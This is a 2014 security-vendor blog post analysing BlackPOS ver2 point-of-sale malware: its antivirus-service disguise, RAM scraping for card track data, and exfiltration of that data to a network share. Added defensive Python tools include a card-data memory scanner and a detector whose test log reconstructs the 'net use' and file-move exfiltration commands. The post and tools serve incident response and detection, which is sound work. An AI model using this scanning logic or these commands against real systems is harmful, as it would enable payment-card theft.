
New BlackPOS Malware Emerges in the Wild, Targets Retail Accounts

  • Posted on:August 29, 2014 at 12:25 am
  • Posted in:Malware
  • Author:
    Rhena Inocencio (Threat Response Engineer)

We recently spotted a brand new BlackPOS (point-of-sale) malware, detected by Trend Micro as TSPY_MEMLOG.A. In 2012, the source code of BlackPOS was leaked, enabling other cybercriminals and attackers to enhance its code. What is interesting about TSPY_MEMLOG.A is that it disguises itself as an installed service of a known AV vendor's software to avoid being detected and consequently deleted from the infected PoS systems. This routine differs from previous PoS malware such as TSPY_POCARDL.U and TSPY_POCARDL.AB (BlackPOS), which employed the targeted company's own installed service.

The malware can be run with the options -start, -stop, -install and -uninstall. The -install option registers the malware as a service named "<AV_Company> Framework Management Instrumentation", and the -uninstall option deletes that service. The RAM scraping routine begins as a thread when the installed service starts; the malware only runs its main routine if it has successfully been registered as a service.
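A defender-side check for this masquerade, written as an added example (not code from the post or from Trend Micro): it walks a list of service records, flags any whose display name follows the "<vendor> Framework Management Instrumentation" pattern, and then tests whether the service binary actually lives under the claimed vendor's directory or runs from a user-writable path. The records are constructed for the example and mirror the Win32_Service fields Name, DisplayName and PathName; "ExampleAV" is a placeholder vendor, and the path heuristics are assumptions, not indicators from the post.

```python
import re
from typing import Dict, List

# Display-name pattern the post attributes to TSPY_MEMLOG.A's service:
# "<AV_Company> Framework Management Instrumentation"
MASQUERADE_NAME = re.compile(
    r"^(?P<vendor>\S+)(?:\s+\S+)*?\s+Framework Management Instrumentation$", re.I)

# Directories a legitimate AV service binary would not normally run from (assumed heuristic)
WRITABLE_DIRS = ("\\temp\\", "\\users\\", "\\programdata\\")


def check_service(svc: Dict[str, str]) -> List[str]:
    """Return the reasons (empty if none) a service record looks like the
    masquerading BlackPOS service.  Keys mirror Win32_Service Name/DisplayName/PathName."""
    reasons = []
    display = svc["display_name"].strip()
    path = svc["binary_path"].lower()

    m = MASQUERADE_NAME.match(display)
    if m:
        reasons.append("display name matches '<vendor> Framework Management Instrumentation'")
        vendor = m.group("vendor").lower()
        # a real vendor's service runs from that vendor's install directory;
        # the malware borrows the vendor's name but not its path
        if vendor not in path:
            reasons.append(f"binary path does not contain the claimed vendor '{vendor}'")

    if any(d in path for d in WRITABLE_DIRS):
        reasons.append("binary runs from a user-writable directory")
    return reasons


def suspicious_services(records: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map service name -> reasons for every record that raised at least one."""
    result = {}
    for svc in records:
        reasons = check_service(svc)
        if reasons:
            result[svc["name"]] = reasons
    return result


# Constructed sample records (not from the post); "ExampleAV" is a placeholder vendor
SERVICES = [
    {"name": "ExampleAVFMI",
     "display_name": "ExampleAV Framework Management Instrumentation",
     "binary_path": r"C:\Windows\Temp\fmi.exe"},
    {"name": "ExampleAVCore",
     "display_name": "ExampleAV Core Service",
     "binary_path": r"C:\Program Files\ExampleAV\core.exe"},
    {"name": "Spooler",
     "display_name": "Print Spooler",
     "binary_path": r"C:\Windows\System32\spoolsv.exe"},
]

if __name__ == "__main__":
    for name, reasons in suspicious_services(SERVICES).items():
        print(name)
        for r in reasons:
            print("  -", r)
```

On a live host the records would come from an export of the service table (for instance the Win32_Service WMI class); the name test alone is enough to catch the exact string from this post, and the path tests are what catch the next variant that changes the wording but still drops its binary into a temp directory.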

Apart from masquerading as an AV software service, another new tactic of TSPY_MEMLOG.A is its updated process iteration function. It uses the CreateToolhelp32Snapshot API to list and iterate over all running processes, whereas BlackPOS variants typically use the EnumProcesses API for this.

After it has read and matched the track data, it drops and runs a component, t.bat. Track data is where the information necessary to carry out card transactions is located; on the card it is stored either on the magnetic stripe or in the embedded chip.

The data eventually gets written out to a file called McTrayErrorLogging.dll. This is similar to what happened in the PoS malware attack on the retailer Target in December 2013.

 

Figure 1. CreateToolhelp32Snapshot to enumerate processes

Based on our analysis, this PoS malware uses a new custom search routine to check the RAM for track data; such custom search routines have replaced the regex search in newer PoS malware. It reads 0x20000 (hexadecimal) bytes in each pass and continues scanning until it has covered the entire memory region of the process being inspected.
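The chunked scan has a failure mode worth seeing in code: a track record that straddles a 0x20000-byte boundary is invisible to a scanner that inspects each chunk in isolation. The following added example (not the malware's routine and not Trend Micro code) is a defensive scanner of the kind used in incident response and PCI data-discovery work: it searches a memory dump or file for Track 2 records with the same 0x20000-byte pass size, carries an overlap across chunk boundaries, validates candidates with the Luhn check and masks the PAN before reporting. The region is constructed inline from zero-filled memory and the standard Visa test PAN; the Track 2 regular expression and the 40-character record limit are assumptions based on the public ISO/IEC 7813 layout, not details from the post.

```python
import re
from typing import List, Tuple

CHUNK = 0x20000          # bytes read per pass, as described for the TSPY_MEMLOG.A scraper
MAX_TRACK2 = 40          # a Track 2 record is at most 40 characters including sentinels

# Track 2 layout: ';' PAN (13-19 digits) '=' YYMM service-code discretionary-data '?'
TRACK2 = re.compile(rb";(?P<pan>\d{13,19})=\d{7,}\?")


def luhn_ok(pan: bytes) -> bool:
    """Luhn check-digit test; cuts false positives from random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = ch - 0x30
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask(pan: bytes) -> bytes:
    """Keep the first six and last four digits so findings can be logged safely."""
    return pan[:6] + b"*" * (len(pan) - 10) + pan[-4:]


def scan_region(region: bytes, chunk: int = CHUNK,
                overlap: int = MAX_TRACK2 - 1) -> List[Tuple[int, bytes]]:
    """Scan a memory region (or dump file) chunk by chunk.

    Each window is extended by `overlap` bytes so a record straddling a chunk
    boundary is still seen whole; matches that start inside the overlap are
    left to the next window so nothing is reported twice.  overlap=0 reproduces
    the naive per-chunk scan and shows what it misses."""
    found = {}
    pos = 0
    while pos < len(region):
        window = region[pos:pos + chunk + overlap]
        for m in TRACK2.finditer(window):
            if m.start() >= chunk:          # belongs to the next chunk; seen there
                continue
            pan = m.group("pan")
            if luhn_ok(pan):
                found[pos + m.start()] = mask(pan)
        pos += chunk
    return sorted(found.items())


# Constructed test region (not real data): zero-filled memory with three records
# placed inside it.  4111111111111111 is the standard Visa test PAN.
REGION = bytearray(2 * CHUNK)
_fully_inside = b";4111111111111111=2512101123456789?"   # within chunk 0
_straddling = b";4111111111111111=2512101123456789?"     # crosses the chunk 0 / chunk 1 boundary
_luhn_invalid = b";4111111111111112=2512101123456789?"   # right format, bad check digit
REGION[100:100 + len(_fully_inside)] = _fully_inside
REGION[CHUNK - 10:CHUNK - 10 + len(_straddling)] = _straddling
REGION[CHUNK + 500:CHUNK + 500 + len(_luhn_invalid)] = _luhn_invalid
REGION = bytes(REGION)

if __name__ == "__main__":
    print("with overlap:   ", scan_region(REGION))
    print("without overlap:", scan_region(REGION, overlap=0))
```

Run against the constructed region, the overlapping scan reports both valid records (offsets 100 and 0x1FFF6) while the naive scan reports only the first; the Luhn-invalid record is dropped by both. The same overlap-and-dedupe pattern applies to any chunked search of a dump, whatever the pattern being sought.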

Figure 2. Screenshot of reading process memory

Figure 3. Logging of data

It has an exclusion list of processes to ignore, since track data is not found in them. It gathers track data by scanning the memory of all running processes except for the following:

  • smss.exe
  • csrss.exe
  • wininit.exe
  • services.exe
  • lsass.exe
  • svchost.exe
  • winlogon.exe
  • sched.exe
  • spoolsv.exe
  • System
  • conhost.exe
  • ctfmon.exe
  • wmiprvse.exe
  • mdm.exe
  • taskmgr.exe
  • explorer.exe
  • RegSrvc.exe
  • firefox.exe
  • chrome.exe

This skipping of scanning specific processes is similar to VSkimmer (detected as BKDR_HESETOX.CC).

In TSPY_MEMLOG.A, the credit card track data grabbed from memory is saved into the file McTrayErrorLogging.dll and sent to a shared location within the same network. We have seen this routine in another BlackPOS/Kaptoxa variant, detected as TSPY_POCARDL.AB. The only difference is that TSPY_MEMLOG.A uses a batch file to move the gathered data to the network share, while TSPY_POCARDL.AB executes the net command via cmd.exe. It is highly possible that the server is compromised, since the malware uses a specific username to log into the domain.

Data Exfiltration Mechanism

The malware drops the component t.bat, which is responsible for transferring the data from McTrayErrorLogging.dll to a specific location in the network, t:\temp\dotnet\NDP45-KB2737084-x86.exe. It uses the following command to transfer the gathered data:

Figure 4. Screenshot of command used to transfer data

The "net use" command is used to connect from one machine to another machine's drive. The malware uses a specific username to log into the domain shown above (by IP address): it maps drive D of 10.44.2.153 as the local device t:.
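The exfiltration sequence the post describes (t.bat maps a share on a raw IP address with explicit credentials, then moves McTrayErrorLogging.dll onto that drive) is easy to spot in process-creation telemetry. The following added example (not from the post or from Trend Micro) walks a list of command lines in order, tracks which drive letters are mapped to IP-addressed shares via net use with a /user: argument, and raises a high-severity finding when a copy or move later targets one of those drives. The command lines are constructed for the example: the IP and destination path are the ones the post names, but the share, account and password are placeholders, and a real deployment would feed in Sysmon or similar process-creation events (an assumption about the data source).

```python
import re
from typing import Dict, List

# "net use <drive>: \\<host>\<share> [password] /user:<account>" as typed into cmd.exe
NET_USE = re.compile(
    r"\bnet(?:\.exe)?\s+use\s+(?P<drive>[a-z]):\s+\\\\(?P<host>[^\\\s]+)\\(?P<share>\S+)"
    r"(?:\s+(?P<password>\S+))?\s+/user:(?P<account>\S+)", re.I)
NET_DELETE = re.compile(r"\bnet(?:\.exe)?\s+use\s+(?P<drive>[a-z]):\s+/delete\b", re.I)
FILE_MOVE = re.compile(
    r"\b(?:copy|move|xcopy)\s+(?P<src>\S+)\s+(?P<dst>(?P<drive>[a-z]):\\\S*)", re.I)
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def analyze(cmdlines: List[str]) -> List[Dict[str, str]]:
    """Walk command lines in order and report the BlackPOS-style pattern:
    a drive mapped to a raw-IP share with explicit credentials, then a file
    moved onto that drive.  Mappings are forgotten again on 'net use x: /delete'."""
    findings = []
    mapped = {}                     # drive letter -> host the share lives on
    for cmd in cmdlines:
        m = NET_USE.search(cmd)
        if m:
            host = m.group("host")
            # a hostname share is ordinary administration; a raw IP with an
            # explicit /user: is what the post describes and is rare in batch files
            if IPV4.match(host):
                mapped[m.group("drive").lower()] = host
                findings.append({
                    "severity": "medium", "cmd": cmd,
                    "reason": f"share on raw IP {host} mapped as {m.group('drive')}: "
                              f"with explicit /user: credentials"})
            continue
        d = NET_DELETE.search(cmd)
        if d:
            mapped.pop(d.group("drive").lower(), None)
            continue
        f = FILE_MOVE.search(cmd)
        if f and f.group("drive").lower() in mapped:
            findings.append({
                "severity": "high", "cmd": cmd,
                "reason": f"{f.group('src')} copied to {f.group('dst')} "
                          f"on {mapped[f.group('drive').lower()]}"})
    return findings


# Constructed command lines (not the post's screenshot); the IP and destination
# path come from the post, the share name, account and password are placeholders
LOG = [
    r"cmd.exe /c t.bat",
    r"net use t: \\10.44.2.153\d$ <password> /user:<domain>\<user>",
    r"move McTrayErrorLogging.dll t:\temp\dotnet\NDP45-KB2737084-x86.exe",
    r"net use t: /delete",
    r"net use z: \\fileserver\public /user:<domain>\<user>",   # hostname share
    r"copy report.xlsx z:\reports\q3.xlsx",                    # benign copy
]

if __name__ == "__main__":
    for finding in analyze(LOG):
        print(finding["severity"].upper(), "-", finding["reason"])
```

The two findings on the constructed log are the mapping of t: to 10.44.2.153 and the move of McTrayErrorLogging.dll onto it; the hostname mapping and the copy to z: produce nothing. The state tracked per drive letter is what lets the rule tie the later move back to the earlier net use, which a stateless per-line signature cannot do.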

In one of the biggest data breaches we saw in 2013, the cybercriminals behind it first offloaded the gathered data to a compromised server, while a different malware running on that server uploaded it to an FTP server. We surmise that this new BlackPOS malware uses the same exfiltration tactic.

Countermeasures

PoS malware can arrive on the affected network via the following means:

  • Targeting specific servers as a point of entry, followed by lateral movement
  • Hacking network communication
  • Infecting machines before deployment

As such, we recommend that enterprises and large organizations implement a multi-layered security solution to ensure their network is protected against vulnerabilities in systems and applications, as these may be used to infiltrate the network. In addition, also check whether a system component has been modified or changed, as criminals are using known in-house software applications to hide their tracks. IT administrators can use the information on malware routines and indicators of compromise (IoCs) here to determine whether their network has already been compromised by this new BlackPOS malware. For more information on PoS malware, read our white paper, Point-of-Sale System Breaches: Threats to the Retail and Hospitality Industries.

Trend Micro protects enterprises from threats like PoS malware by detecting the malicious file.

The hash (MD5) related to this threat is b57c5b49dab6bbd9f4c464d396414685.

With additional analysis from Numaan Huq

Update as of 9:44 AM, September 8, 2014

During the course of our investigation, we spotted the following anti-American messages embedded in the binary:

Figure 5. Screenshot of the messages embedded in the binary

Note that these strings are not used anywhere in the code; we surmise that they may serve as a signature of the group developing this malware.

Update as of 2:27 PM, September 11, 2014

Even though BlackPOS ver2 has entirely different code from the BlackPOS which compromised Target, it duplicates the data exfiltration technique used by the Target BlackPOS. It is an improved clone of the original, which is why we decided to call it BlackPOS ver2.

It is also being reported in the press that some security vendors have called this malware "FrameworkPOS." This is a play on the service name <AV_Company> Framework Management Instrumentation with which the malware installs itself.
